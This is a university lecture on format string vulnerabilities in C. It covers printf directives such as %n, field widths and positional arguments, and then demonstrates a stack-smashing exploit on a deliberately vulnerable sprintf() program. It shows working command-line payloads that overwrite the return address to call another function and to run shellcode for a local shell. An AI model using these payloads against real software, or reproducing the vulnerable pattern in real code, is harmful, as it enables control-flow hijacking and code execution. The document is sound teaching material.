Lec. 19: Format String Attacks 1
1 Format String Attacks
A format string attack is an alternative way of exploiting a program that doesn't necessarily require smashing the stack. Instead, it leverages the format directives in a format string to generate excessive data, read from arbitrary memory, or write to arbitrary memory.
At the heart of a format string attack is a casual programming error that lets the user supply the format string itself, not just the arguments to the format. For example:
    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char * argv[]){
      printf(argv[1]); // user controls the format
      printf("\n");
    }
In this program, the user provides the format portion of the printf(). When we run it with the most common kinds of input, it doesn't matter:
    user@si485H-base:demo$ ./format_error "Hello World"
    Hello World
    user@si485H-base:demo$ ./format_error "Go Navy"
    Go Navy
    user@si485H-base:demo$ ./format_error "%x"
    b7fff000
However, notice what happens when you give it a format directive, i.e., one that starts with a '%'. The directive is interpreted, and the output is a value read off the stack, which here happens to be an address. What if we were to give it something longer? What if we were to give it something that causes a memory address to be dereferenced, like '%s':
    user@si485H-base:demo$ ./format_error "%s.%s.%s.%s.%s.%s.%s"
    4.??u?.UW1?VS???????unull).(null).?$?U?
    user@si485H-base:demo$ ./format_error "%s.%s.%s.%s.%s.%s.%s.%s"
    Segmentation fault (core dumped)
We can actually get the program to crash, and from what we've seen so far, getting a program to crash is usually the first step towards exploiting it, which is what we'll eventually do.
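For contrast, here is a minimal sketch of the usual fix: keep the format constant and pass the user's text as an argument, so any '%' it contains is copied rather than interpreted. The helper name copy_user_text is made up for illustration, and it formats into a buffer instead of the terminal only so that the result is easy to inspect.

```c
#include <stdio.h>

/* Hypothetical helper (not part of the lecture's demo code): copies user
   text into dst through a constant "%s" format, so directives inside the
   user text are treated as plain characters. Returns what snprintf()
   returns: the length the full output needs, excluding the null byte. */
int copy_user_text(char *dst, size_t size, const char *user)
{
    return snprintf(dst, size, "%s", user);
}
```

Calling copy_user_text(buf, sizeof buf, "%x.%x") leaves the literal text %x.%x in buf. In format_error, the equivalent change would be printf("%s", argv[1]).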
2 Uncommon Formats and Format Options
In order to fully leverage the power of format strings, we need to review the full list of conversions and format options. Refer to the manual page, man 3 printf, for all the details.
2.1 %n : Saving the Number of Bytes
The formatted-printing functions let you save the number of bytes formatted so far into a variable. There is a decent chance you've never heard of this conversion, but it is surprisingly useful for certain tasks. For example, given a format and its arguments, it is not obvious how long the output will be until it is actually formatted.
Here's a basic example of using %n:
    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char *argv[]){
      int count_one, count_two;

      printf("The number of bytes written up to this point X%n is being stored in count_one, "
             "and the number of bytes up to here X%n is being stored in count_two.\n",
             &count_one, &count_two);

      printf("count_one: %d\n", count_one);
      printf("count_two: %d\n", count_two);

      return 0;
    }
The %n conversion matches an address, in particular the address of an integer, at which the number of bytes formatted up to that point is stored. So, for example, running this program, we get:
    user@si485H-base:demo$ ./format_n
    The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
    count_one: 46
    count_two: 113
Note that %n itself produces nothing in the output: it prints no characters and only has a side effect.
OK, so why does this format exist? Well, there are some really practical uses. For example, consider counting the digits of a number read in using scanf():
    user@si485H-base:demo$ cat scanf_n.c
    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char * argv[]){
      int a,n;
      scanf("%d%n",&a,&n); // %n stores how many characters have been consumed so far
      printf("Number: %d Digits: %d\n",a,n);
    }
    user@si485H-base:demo$ ./scanf_n
    1234567890
    Number: 1234567890 Digits: 10
Another use is aligning text. There are plenty of reasonable reasons to have this format.
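As a sketch of the alignment use case, the helper below records with %n the column at which a value starts, so that something can later be lined up underneath it. The name format_with_column is invented for this example. The format is a string literal on purpose, since hardened C library builds may refuse %n when the format string lives in writable memory.

```c
#include <stdio.h>

/* Hypothetical helper: formats "<label>: <value>" into buf and uses %n to
   record, in *value_col, the number of bytes produced before the value.
   Returns snprintf()'s result (length needed, excluding the null byte). */
int format_with_column(char *buf, size_t size, const char *label,
                       int value, int *value_col)
{
    return snprintf(buf, size, "%s: %n%d", label, value_col, value);
}
```

For the label "total" and the value 42, buf holds "total: 42" and *value_col is 7, the index of the first digit. A marker could then be placed under the value with printf("%*s^\n", col, ""), which pads with col spaces before the caret.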
2.2 Format Flag and Argument Options
We will also need some of the extra options that control how a conversion is printed. So far you are fairly familiar with the conversion formats:
- %d : signed number
- %u : unsigned number
- %x : hexadecimal number
- %f : floating point number
- %s : string conversion
What you might not be aware of is that there is a wealth of further options for changing the formatting. Here's a sample program that illustrates some of these so-called "flag" options:
    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char * argv[]){
      int x = 0xdeadbeef;

      printf("%%d:(%d)\n",x);
      printf("%%u:(%u)\n",x);
      printf("%%x:(%x)\n",x);
      printf("%%#x:(%#x)\n",x);
      printf("%%#50x:(%#50x)\n",x);
      printf("%%#050x:(%#050x)\n",x);
      printf("%%1$#050x %%1$d:(%1$#050x %1$d)\n",x);
      printf("%%1$#050hx %%1$hd:(%1$#050hx %1$hd)\n",x);    // h: low 2 bytes
      printf("%%1$#050hhx %%1$hd:(%1$#050hhx %1$hhd)\n",x); // hh: low byte
    }
    user@si485H-base:demo$ ./unusual_formats
    %d:(-559038737)
    %u:(3735928559)
    %x:(deadbeef)
    %#x:(0xdeadbeef)
    %#50x:(                                        0xdeadbeef)
    %#050x:(0x0000000000000000000000000000000000000000deadbeef)
    %1$#050x %1$d:(0x0000000000000000000000000000000000000000deadbeef -559038737)
    %1$#050hx %1$hd:(0x00000000000000000000000000000000000000000000beef -16657)
    %1$#050hhx %1$hd:(0x0000000000000000000000000000000000000000000000ef -17)
The first flag option is "#", which adds prefix formatting. When printing in hexadecimal, it adds '0x' to the start of non-zero values. That's pretty useful.
The next option is a number placed before the conversion character, as in %#50x. This is the field width: the output is right-adjusted and padded with spaces so that the whole field, including the '0x' prefix, takes up at least 50 characters. If you add a leading 0 to the width, as in %#050x, the padding is filled with 0's instead of spaces.
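A smaller version of the same idea, using a width of 12 so the padding is easy to count, might look like the sketch below. The helper name format_hex12 is hypothetical, and the result is written to a buffer so it can be compared as a string.

```c
#include <stdio.h>

/* Hypothetical helper: formats value with the '#' flag and a field width
   of 12, either space-padded ("%#12x") or zero-padded ("%#012x").
   Returns snprintf()'s result. */
int format_hex12(char *buf, size_t size, unsigned int value, int zero_pad)
{
    if (zero_pad)
        return snprintf(buf, size, "%#012x", value);
    return snprintf(buf, size, "%#12x", value);
}
```

With the value 0xdeadbeef, the space-padded form gives two spaces followed by 0xdeadbeef, while the zero-padded form gives 0x00deadbeef: the zeros go between the prefix and the digits.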
Perhaps the least familiar option is the m$ form, where m is some number; it lets you refer to a specific argument by its position. In the example above, we refer to the same argument twice using two different conversions. This is really useful for not having to pass the same argument multiple times; however, once you use $ references, you have to use them for every conversion in the format.
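Here is a minimal sketch of the m$ form in isolation. The helper name format_twice is made up, and the positional syntax is a POSIX extension rather than ISO C, so a strictly pedantic compiler may warn about it.

```c
#include <stdio.h>

/* Hypothetical helper: prints a single argument twice, once as hex and
   once as unsigned decimal, by referring to argument 1 in both
   conversions. Returns snprintf()'s result. */
int format_twice(char *buf, size_t size, unsigned int value)
{
    return snprintf(buf, size, "%1$x %1$u", value);
}
```

For 0xdeadbeef this yields "deadbeef 3735928559" even though only one argument follows the format.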
Finally, we have the half-size option h, which says to convert only half the typical size. In this case, since we are working with 4-byte integer values, one h formats a 2-byte short-sized value, and two, hh, format a single 1-byte char-sized value.
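The effect of h and hh can be sketched on its own as follows. The helper name format_low_bytes is hypothetical; it passes the full 4-byte value and lets the conversion do the narrowing, as the lecture's program does, which some compilers flag with a format warning.

```c
#include <stdio.h>

/* Hypothetical helper: prints the low two bytes (%hx) and then the low
   byte (%hhx) of the same 4-byte value. Returns snprintf()'s result. */
int format_low_bytes(char *buf, size_t size, unsigned int value)
{
    return snprintf(buf, size, "%hx %hhx", value, value);
}
```

For 0xdeadbeef the buffer ends up holding "beef ef".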
2.3 Flag Options for Strings
With strings, things are similar but a bit different. Here's some example code:
    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char * argv[]){
      char * string = "Go Navy! Beat Army!";

      printf("%%s:(%s)\n",string);
      printf("%%50s:(%50s)\n",string);
      printf("%%.5s:(%.5s)\n",string);
      printf("%%50.5s:(%50.5s)\n",string);
      printf("%%-50.5s:(%-50.5s)\n",string);
    }
    user@si485H-base:demo$ ./string_formats
    %s:(Go Navy! Beat Army!)
    %50s:(                               Go Navy! Beat Army!)
    %.5s:(Go Na)
    %50.5s:(                                             Go Na)
    %-50.5s:(Go Na                                             )
Like with numbers, we can specify a field width to right-adjust the string to some specified size, but we can't fill the padding with 0's. Instead, the padding is filled with spaces.
Unlike with integers (though something similar can be done with floating point numbers), we can also truncate the output by using the . option. The number following the . says at most how many bytes from the string should be used, and this can be combined with the right adjustment. And, interestingly, the right adjustment can be flipped to left adjustment with a minus sign.
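The combination of width, truncation, and the minus sign can be sketched with smaller numbers than in the program above. The helper name format_clipped is invented, and the square brackets are only there to make the padding visible.

```c
#include <stdio.h>

/* Hypothetical helper: keeps at most 5 bytes of s (the ".5" part) and
   pads the result to 10 columns, right-adjusted by default or
   left-adjusted when the '-' flag is used. Returns snprintf()'s result. */
int format_clipped(char *buf, size_t size, const char *s, int left)
{
    if (left)
        return snprintf(buf, size, "[%-10.5s]", s);
    return snprintf(buf, size, "[%10.5s]", s);
}
```

For "Go Navy! Beat Army!" the right-adjusted form gives "[     Go Na]" and the left-adjusted form gives "[Go Na     ]".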
While all of this is on the output side, and you can imagine where it might be super useful, the width option also matters on the input side. From the security perspective of overflow protection, the width given to scanf() becomes a limit on how many bytes can be written to the target address:
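    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char * argv[]){
      char string[11];      // 10 characters plus the terminating null byte
      scanf("%10s",string); // the width caps the characters stored; the null byte is extra
      printf("%s\n",string);
    }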
    user@si485H-base:demo$ ./scanf_format
    HELLLOOOOOOOOOOOOOOO
    HELLLOOOOO
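One detail worth spelling out is that the width given to %s counts the characters stored and not the terminating null byte, so the buffer has to be at least one byte larger than the width. A minimal sketch, using sscanf() on a string instead of standard input so it is easy to try, with the made-up helper name read_word:

```c
#include <stdio.h>

/* Hypothetical helper: reads one whitespace-delimited word from input
   into a 10-byte buffer. The width 9 leaves room for the null byte that
   %s always appends. Returns 1 if a word was stored, 0 otherwise. */
int read_word(const char *input, char out[10])
{
    return sscanf(input, "%9s", out) == 1;
}
```

Feeding it "HELLLOOOOOOOOOOOOOOO" stores the 9 characters "HELLLOOOO" plus the null byte, exactly filling the 10-byte buffer.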
3 Using formats in an exploit
Now that we've had a whirlwind tour of formats you've never heard of nor ever really wanted to use, how can we use them in an exploit? We'll look at one method in this lesson involving stack smashing, but we'll see some other techniques soon.
Here's the program we are going to exploit:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    void good(){
      printf("good\n");
    }

    void bad(){
      printf("bad\n");
    }

    void vuln(char * str){
      char outbuf[512];
      char buffer[512];

      sprintf (buffer, "ERR Wrong command: %.400s", str);
      sprintf (outbuf, buffer); //<--- used as a silly copy

      printf("outbuf: %s\n", outbuf);
    }

    int main(int argc, char *argv[]){
      vuln(argv[1]);
    }
This is a rather contrived example of using sprintf() to do a copy. You might think that because the first sprintf() uses the %.400s format, neither buffer nor outbuf can be overflowed. For example, this does not cause a segmentation fault:
user@si485H-base:demo$ ./format_overflow `python -c "print 'A'*1000"` outbuf: ERR Wrong command: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
True, we can't overflow buffer, but we can overflow outbuf because buffer is treated as the format string in the second sprintf(). For example, what if the input was like:
    user@si485H-base:demo$ ./format_overflow "%550x"
    outbuf: ERR Wrong command: bffff897
    Segmentation fault (core dumped)
And if we look at the dmesg output:
    user@si485H-base:demo$ dmesg | tail -1
    [181031.140058] format_overflow[16736]: segfault at 20202020 ip 20202020 sp bffff6b0 error 14
We see that we overwrote the instruction pointer with a bunch of 0x20 bytes, or spaces! Now, the goal is to overwrite the return address with something useful, like the address of bad().
    user@si485H-base:demo$ objdump -d format_overflow | grep bad
    08048481 <bad>:
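The "%550x" crash comes from expansion: the five characters of the directive pass through the %.400s limit untouched and only grow to 550 bytes when the second sprintf() interprets them. That growth can be measured without overflowing anything, as in the sketch below. The helper name expanded_length is hypothetical, and it relies on two standard printf features not covered above: a size of 0 makes snprintf() count without writing, and a '*' width is taken from an argument.

```c
#include <stdio.h>

/* Hypothetical helper: reports how many bytes a width-padded %x produces
   after the lecture's "ERR Wrong command: " prefix. Nothing is written
   because the destination size is 0; snprintf() only counts. */
int expanded_length(int width, unsigned int value)
{
    return snprintf(NULL, 0, "ERR Wrong command: %*x", width, value);
}
```

With a width of 550 the result is 19 + 550 = 569 bytes, well past the 512 bytes of outbuf.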
To overwrite the return address, we need exactly the right amount of format padding in front of the bytes we want to land there. We can find it by first writing 0xdeadbeef after the padding and checking the dmesg output:
    user@si485H-base:demo$ ./format_overflow "%500d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
    Segmentation fault (core dumped)
    [181507.663004] format_overflow[16817]: segfault at deadbe ip 08048504 sp bffff6b0 error 4 in format_overflow[8048000+1000]
    user@si485H-base:demo$ ./format_overflow "%501d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
    Illegal instruction (core dumped)
    [181507.663004] format_overflow[16817]: segfault at deadbe ip 08048504 sp bffff6b0 error 4 in format_overflow[8048000+1000]
    user@si485H-base:demo$ ./format_overflow "%502d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
    Segmentation fault (core dumped)
    [181516.038682] format_overflow[16827]: segfault at 80400de ip 080400de sp bffff6b0 error 14 in format_overflow[8048000+1000]
    user@si485H-base:demo$ ./format_overflow "%503d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
    Segmentation fault (core dumped)
    [181519.371290] format_overflow[16832]: segfault at 800dead ip 0800dead sp bffff6b0 error 14 in format_overflow[8048000+1000]
    user@si485H-base:demo$ ./format_overflow "%504d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
    Segmentation fault (core dumped)
    [181522.598268] format_overflow[16837]: segfault at deadbe ip 00deadbe sp bffff6b0 error 14 in format_overflow[8048000+1000]
    user@si485H-base:demo$ ./format_overflow "%505d$(printf '\xef\xbe\xad\xde')" > /dev/null ; dmesg | tail -1
    Segmentation fault (core dumped)
    [181526.367333] format_overflow[16842]: segfault at deadbeef ip deadbeef sp bffff6b0 error 15
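So if we pad a %d to a width of 505, the next 4 bytes we write land on the return address: the prefix "ERR Wrong command: " is 19 bytes, so in this build the return address sits 19 + 505 = 524 bytes past the start of outbuf. Putting the address of bad() there, we get what we want: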
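The arithmetic and the byte order can be written down as a short sketch. Everything here is illustrative: build_payload is a made-up name, and the 524-byte offset is only what the dmesg experiment suggests for this particular build. The helper produces the same argument string that the shell printf builds on the command line.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: writes "%<width>d" followed by the 4 bytes of addr
   in little-endian order, as the x86 target expects. The width is the
   distance to the return address minus the prefix that is already in
   front of the padding. Returns the payload length, or -1 on error.
   Assumes no byte of addr is zero, since a zero byte would end the
   command-line argument early. */
int build_payload(char *out, size_t size, size_t ret_offset,
                  const char *prefix, unsigned long addr)
{
    size_t prefix_len = strlen(prefix);
    if (ret_offset < prefix_len)
        return -1;

    size_t width = ret_offset - prefix_len;      /* e.g. 524 - 19 = 505 */
    int n = snprintf(out, size, "%%%zud", width);
    if (n < 0 || (size_t)n + 5 > size)           /* 4 address bytes + null */
        return -1;

    for (int i = 0; i < 4; i++)
        out[n + i] = (char)((addr >> (8 * i)) & 0xff);
    out[n + 4] = '\0';
    return n + 4;
}
```

With an offset of 524, the lecture's prefix, and the address 0x08048481, the result is the 9-byte string %505d followed by the bytes 81 84 04 08.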
    user@si485H-base:demo$ objdump -d format_overflow | grep bad
    08048481 <bad>:
    user@si485H-base:demo$ ./format_overflow "%505d$(printf '\x81\x84\x04\x08')"
    outbuf: ERR Wrong command: -1073743725??
    bad
    Segmentation fault (core dumped)
We can also get this to execute a shell in the normal way, by placing shellcode right after the return address (note how I adjusted the jump point to the stack pointer value reported by dmesg).
    user@si485H-base:demo$ ./format_overflow "%505d$(printf '\xef\xbe\xad\xde')$(printf $(./hexify.sh smallest_shell))"
    outbuf: ERR Wrong command: -1073743746ᆳ?1???Phn/shh//bi?? ̀
    Segmentation fault (core dumped)
    user@si485H-base:demo$ dmesg | tail -1
    [181798.445440] format_overflow[16919]: segfault at deadbeef ip deadbeef sp bffff690 error 15
    user@si485H-base:demo$ ./format_overflow "%505d$(printf '\x90\xf6\xff\xbf')$(printf $(./hexify.sh smallest_shell))"
    outbuf: ERR Wrong command: -1073743746????1???Phn/shh//bi?? ̀
    $ echo "I did it!"
    I did it!
    $